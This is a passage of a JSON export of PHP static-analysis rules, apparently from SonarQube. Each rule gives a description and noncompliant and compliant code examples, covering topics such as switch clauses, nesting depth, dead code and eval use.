<li> MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions. 
<\/li>\n  <li> MISRA C:2012, 2.7 - There should be no unused parameters in functions <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1185","repo":"php","name":"Overriding methods should do more than simply call the same method in the super class","htmlDesc":"<p>Overriding a method just to call the same method from the super class without performing any other actions is useless and misleading. The only time\nthis is justified is in <code>final<\/code> overriding methods, where the effect is to lock in the parent class behavior. This rule ignores such\noverrides of <code>equals<\/code>, <code>hashCode<\/code> and <code>toString<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Child extends Parent {\n\n  public function func($n, $m) {\n    parent::func($n, $m);  \/\/ Noncompliant\n  }\n}\n\nclass Parent {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Child extends Parent {\n\n  public function func($n, $m) {\n    parent::func($n, $m);\n    \/\/ do additional things...\n  }\n}\n\nclass Parent {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nclass Child extends Parent {\n  \/\/ function eliminated\n}\n\nclass Parent {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1192","repo":"php","name":"String literals should not be duplicated","htmlDesc":"<p>Duplicated string literals make the process of refactoring error-prone, since you must be sure 
to update all occurrences.<\/p>\n<p>On the other hand, constants can be referenced from many places, but only need to be updated in a single place.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction run() {\n  prepare('action1');                              \/\/ Non-Compliant - 'action1' is duplicated 3 times\n  execute('action1');\n  release('action1');\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst ACTION_1 = 'action1';\n\nfunction run() {\n  prepare(ACTION_1);\n  execute(ACTION_1);\n  release(ACTION_1);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>To prevent generating some false positives, literals having fewer than 5 characters are excluded.<\/p>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"threshold","htmlDesc":"Number of times a literal must be duplicated to trigger an issue","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1200","repo":"php","name":"Classes should not be coupled to too many other classes (Single Responsibility Principle)","htmlDesc":"<p>According to the Single Responsibility Principle, introduced by Robert C. 
Martin in his book \"Principles of Object Oriented Design\", a class should\nhave only one responsibility:<\/p>\n<blockquote>\n  <p>If a class has more than one responsibility, then the responsibilities become coupled.<\/p>\n  <p>Changes to one responsibility may impair or inhibit the class' ability to meet the others.<\/p>\n  <p>This kind of coupling leads to fragile designs that break in unexpected ways when changed.<\/p>\n<\/blockquote>\n<p>Classes which rely on many other classes tend to aggregate too many responsibilities and should be split into several smaller ones.<\/p>\n<p>Nested class dependencies are not counted as dependencies of the outer class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n  class Foo {            \/\/ Noncompliant - Foo depends on too many classes: T1, T2, T3, T4, T5, T6 and T7\n    \/**\n     * @var T1\n     *\/\n    public $a1;          \/\/ Foo is coupled to T1\n    \/**\n     * @var T2\n     *\/\n    protected $a2;       \/\/ Foo is coupled to T2\n    \/**\n     * @var T3\n     *\/\n    private $a3;         \/\/ Foo is coupled to T3\n\n    \/**\n     * @param T5\n     * @param T6\n     *\n     * @return T4\n     *\/\n    public function compute(T5 $a, $b) { \/\/ Foo is coupled to T4, T5 and T6\n      $result = new T7();     \/\/ Foo is coupled to T7\n      return $result;\n    }\n  }\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of classes a single class is allowed to depend upon","defaultValue":"20","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S121","repo":"php","name":"Control structures should use curly braces","htmlDesc":"<p>While not technically incorrect, the omission of curly braces can be misleading, and may lead to the introduction of errors during maintenance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ the two statements seem to be attached to the if statement, but that is only true for the first one:\nif (condition)\n  
executeSomething();\n  checkSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) {\n  executeSomething();\n  checkSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.8 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n  <li> MISRA C:2004, 14.9 - An if (expression) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n  compound statement, or another if statement <\/li>\n  <li> MISRA C++:2008, 6-3-1 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n  <li> MISRA C++:2008, 6-4-1 - An if (condition) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n  compound statement, or another if statement <\/li>\n  <li> MISRA C:2012, 15.6 - The body of an iteration-statement or a selection-statement shall be a compound-statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1QGMAg\">CERT, EXP19-C.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S122","repo":"php","name":"Statements should be on separate lines","htmlDesc":"<p>For better readability, do not put more than one statement on a single line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(someCondition) doSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(someCondition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Anonymous functions containing a single statement are ignored.<\/p>\n<pre>\n$max_comparator = function ($v) { return $v &gt; 2; };           \/\/ Compliant\n$max_comparator = 
function ($v) { echo $v; return $v &gt; 2; };  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S125","repo":"php","name":"Sections of code should not be \"commented out\"","htmlDesc":"<p>Programmers should not comment out code as it bloats programs and reduces readability.<\/p>\n<p>Unused code should be deleted and can be retrieved from source control history if required.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 2.4 - Sections of code should not be \"commented out\". <\/li>\n  <li> MISRA C++:2008, 2-7-2 - Sections of code shall not be \"commented out\" using C-style comments. <\/li>\n  <li> MISRA C++:2008, 2-7-3 - Sections of code should not be \"commented out\" using C++ comments. <\/li>\n  <li> MISRA C:2012, Dir. 4.4 - Sections of code should not be \"commented out\" <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S126","repo":"php","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. 
This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n  do_something();\n} else if (condition2) {\n  do_something_else();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1) {\n  do_something();\n} else if (condition2) {\n  do_something_else();\n} else {\n  throw new InvalidArgumentException('message');\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n  <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n  <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1264","repo":"php","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, but the init and increment expressions are missing, a <code>while<\/code>\nloop should be used instead to increase readability. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S127","repo":"php","name":"\"for\" loop stop conditions should be invariant","htmlDesc":"<p>A <code>for<\/code> loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and\nending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins. <\/p>\n<p>Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and likely lead to the\nintroduction of errors in the future.<\/p>\n<p>This rule tracks three types of non-invariant stop conditions:<\/p>\n<ul>\n  <li> When the loop counters are updated in the body of the <code>for<\/code> loop <\/li>\n  <li> When the stop condition depends upon a method call <\/li>\n  <li> When the stop condition depends on an object property, since such properties could change during the execution of the loop. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++) {\n  echo $i;\n  if (condition) {\n    $i = 20;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++) {\n  echo $i;\n}\n\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.6 - Numeric variables being used within a <em>for<\/em> loop for iteration counting shall not be modified in the body of the\n  loop. <\/li>\n  <li> MISRA C++:2008, 6-5-3 - The <em>loop-counter<\/em> shall not be modified within <em>condition<\/em> or <em>statement<\/em>. 
<\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S128","repo":"php","name":"Switch cases should end with an unconditional \"break\" statement","htmlDesc":"<p>When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While\nthis is sometimes intentional, it often is a mistake which leads to unexpected behavior. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($myVariable) {\n  case 1:\n    foo();\n    break;\n  case 2:  \/\/ Both 'do_something()' and 'do_something_else()' will be executed. Is this intentional?\n    do_something();\n  default:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($myVariable) {\n  case 1:\n    foo();\n    break;\n  case 2:\n    do_something();\n    break;\n  default:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule is relaxed in the following cases:<\/p>\n<pre>\nswitch ($myVariable) {\n  case 0:                  \/\/ Empty case used to specify the same behavior for a group of cases.\n  case 1:\n    do_something();\n    break;\n  case 2:                  \/\/ Use of continue statement\n    continue;\n  case 3:                  \/\/ Case includes a jump statement (exit, return, break, etc.)\n    exit(0);\n  case 4:\n    echo 'Second case, which falls through';\n    \/\/ no break        &lt;- comment is used when fall-through is intentional in a non-empty case body\n  default:                 \/\/ For the last case, use of break statement is optional\n    do_something_else();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.2 - An unconditional break statement shall terminate every non-empty switch clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. 
<\/li>\n  <li> MISRA C++:2008, 6-4-5 - An unconditional throw or break statement shall terminate every non-empty switch-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.3 - An unconditional break statement shall terminate every switch-clause <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/484.html\">MITRE, CWE-484<\/a> - Omitted Break Statement in Switch <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YIFLAQ\">CERT, MSC17-C.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZoFLAQ\">CERT, MSC18-CPP.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ewHAAQ\">CERT, MSC52-J.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1301","repo":"php","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($variable) {\n  case 0:\n    do_something();\n    break;\n  default:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($variable == 0) {\n  do_something();\n} else {\n  do_something_else();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n  <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. 
<\/li>\n  <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S131","repo":"php","name":"Statements should end with a \"case default\" clause","htmlDesc":"<p>The requirement for a final <code>case default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain\na suitable comment as to why no action is taken. Even when the <code>switch<\/code> covers all current values of an <code>enum<\/code>, a default case\nshould still be used because there is no guarantee that the <code>enum<\/code> won't be extended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($param) {  \/\/missing default clause\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n}\n\nswitch ($param) {\n  default: \/\/ default clause should be the last one\n    error();\n    break;\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($param) {\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n  default:\n    error();\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. 
<\/li>\n  <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n  <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n  <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S134","repo":"php","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements are a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n  if (condition1) {                  \/\/ Compliant - depth = 1\n    ...\n    if (condition2) {                \/\/ Compliant - depth = 2\n      ...\n      for ($i = 0; $i &lt; 10; $i++) {  \/\/ Compliant - depth = 3, not exceeding the limit\n        ...\n        if (condition4) {            \/\/ Non-Compliant - depth = 4\n          if (condition5) {          \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n            ...\n          }\n          return;\n        }\n      }\n   
 }\n  }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed control flow statement nesting depth.","defaultValue":"4","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S138","repo":"php","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"150","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S139","repo":"php","name":"Comments should not be located at the end of lines of code","htmlDesc":"<p>This rule verifies that single-line comments are not located at the ends of lines of code. 
The main idea behind this rule is that in order to be\nreally readable, trailing comments would have to be properly written and formatted (correct alignment, no interference with the visual structure of\nthe code, not too long to be visible) but most often, automatic code formatters would not handle this correctly: the code would end up less readable.\nComments are far better placed on the previous empty line of code, where they will always be visible and properly formatted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a = $b + $c; \/\/ This is a trailing comment that can be very very long\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ This very long comment is better placed before the line of code\n$a = $b + $c;\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"legalTrailingCommentPattern","htmlDesc":"Pattern for text of trailing comments that are allowed. By default, comments containing only one word.","defaultValue":"^(\/\/|#)\\s*+[^\\s]++$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1479","repo":"php","name":"\"switch\" statements should not have too many \"case\" clauses","htmlDesc":"<p>When <code>switch<\/code> statements have large sets of <code>case<\/code> clauses, it is usually an attempt to map two sets of data. A real map\nstructure would be more readable and maintainable, and should be used instead.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of case","defaultValue":"30","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1481","repo":"php","name":"Unused local variables should be removed","htmlDesc":"<p>If a local variable is declared but not used, it is dead code and should be removed. 
Doing so will improve maintainability because developers will\nnot wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n  $seconds = 0;   \/\/ $seconds is never used\n  return $hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n  return $hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1488","repo":"php","name":"Local Variables should not be declared and then immediately returned or thrown","htmlDesc":"<p>Declaring a variable only to immediately return or throw it is a bad practice.<\/p>\n<p>Some developers argue that the practice improves code readability, because it enables them to explicitly name what is being returned. However, this\nvariable is an internal implementation detail that is not exposed to the callers of the method. The method name should be sufficient for callers to\nknow exactly what will be returned.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n  $duration = ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000 ;\n  return $duration;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n  return ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1523","repo":"php","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. <\/p>\n<p>According to the PHP documentation<\/p>\n<blockquote>\n  <p>The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. 
If you have\n  carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it\n  without properly validating it beforehand.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval($code_to_be_dynamically_executed);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n  Evaluated Code ('Eval Injection') <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S1536","repo":"php","name":"Function argument names should be unique","htmlDesc":"<p>Function arguments should all have different names to prevent any ambiguity. Indeed, if arguments have the same name, the last duplicated argument\nhides all the previous arguments with the same name. This hiding makes no sense, reduces understandability and maintainability, and obviously can be\nerror-prone. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute($a, $a, $c) { \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute($a, $b, $c) { \/\/ Compliant\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1599","repo":"php","name":"Variable variables should not be used","htmlDesc":"<p>PHP's \"variable variables\" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$var = 'foo';\n$$var = 'bar';      \/\/Noncompliant\n$$$var = 'hello';  \/\/Noncompliant\n\necho $foo; \/\/will display 'bar'\necho $bar; \/\/will display 'hello'\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1600","repo":"php","name":"Deprecated predefined variables should not be used","htmlDesc":"<p>The following predefined variables are deprecated and should be replaced by the new versions:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Replace<\/th>\n      <th>With<\/th>\n    <\/tr>\n    <tr>\n      <td>$HTTP_SERVER_VARS<\/td>\n      <td>$_SERVER<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_GET_VARS<\/td>\n      <td>$_GET<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_POST_VARS<\/td>\n      <td>$_POST<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_POST_FILES<\/td>\n      <td>$_FILES<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_SESSION_VARS<\/td>\n      <td>$_SESSION<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_ENV_VARS<\/td>\n      <td>$_ENV<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_COOKIE_VARS<\/td>\n      <td>$_COOKIE<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho 'Name parameter value: ' . $HTTP_GET_VARS[\"name\"];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho 'Name parameter value: ' . $_GET[\"name\"];\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1603","repo":"php","name":"PHP 4 constructor declarations should not be used","htmlDesc":"<p>In PHP 4, any function with the same name as the nesting class was considered a class constructor. In PHP 5, this mechanism has been deprecated and\nthe \"__construct\" method name should be used instead. If both styles are present in the same class, PHP 5 will treat the function named \"__construct\"\nas the class constructor. 
<\/p>\n<p>This rule raises an issue for each method with the same name as the enclosing class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n  function Foo(){...}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n  function __construct(){...}\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1605","repo":"php","name":"\"__construct\" functions should not make PHP 4-style calls to parent constructors","htmlDesc":"<p>In PHP 5 both the way to declare a constructor and the way to make a call to a parent constructor have evolved. When declaring constructors with\nthe PHP5 <code>__construct<\/code> name, nested calls to parent constructors should also use the new <code>__construct<\/code> name.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo extends Bar {\n  function __construct() {\n    parent::Bar();\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo extends Bar {\n  function __construct() {\n    parent::__construct();\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1656","repo":"php","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. 
Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic function setName($name) {\n    $name = $name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function setName($name) {\n    $this-&gt;name = $name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1757","repo":"php","name":"\"<?php\" and \"<?=\" tags should be used","htmlDesc":"<p>Coding conventions allow teams to collaborate effectively. For maximum standardization and readability, PHP code should use the long <code>&lt;?php\n?&gt;<\/code> tags or the short-echo <code>&lt;?= ?&gt;<\/code> tags; it should not use the other tag variations.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?\n$foo = 1;\n?&gt;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n$foo = 1;\n?&gt;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1763","repo":"php","name":"Jump statements should not be followed by other statements","htmlDesc":"<p>Jump statements (<code>return<\/code>, <code>break<\/code>, <code>continue<\/code>, and <code>goto<\/code>) and <code>throw<\/code> expressions move\ncontrol flow out of the current code block. Typically, any statements in a block that come after a jump or <code>throw<\/code> are simply wasted\nkeystrokes lying in wait to confuse the unwary. <\/p>\n<p>Rarely, as illustrated below, code after a jump or <code>throw<\/code> is reachable. 
However, such code is difficult to understand, and should be\nrefactored. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction fun($a) {\n  $i = 10;\n  return $i + $a;\n  $i++;             \/\/ this is never executed\n}\n\nfunction foo($a) {\n  if ($a == 5) {\n    goto error;\n  } else {\n    \/\/ do the job\n  }\n  return;\n\n  error:\n    printf(\"don't use 5\"); \/\/ this is reachable but unreadable\n\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction fun($a) {\n  $i = 10;\n  return $i + $a;\n}\n\nfunction foo($a) {\n  if ($a == 5) {\n    handleError();\n  } else {\n    \/\/ do the job\n  }\n  return;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 0-1-9 - There shall be no dead code <\/li>\n  <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/561.html\">MITRE, CWE-561<\/a> - Dead Code <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a 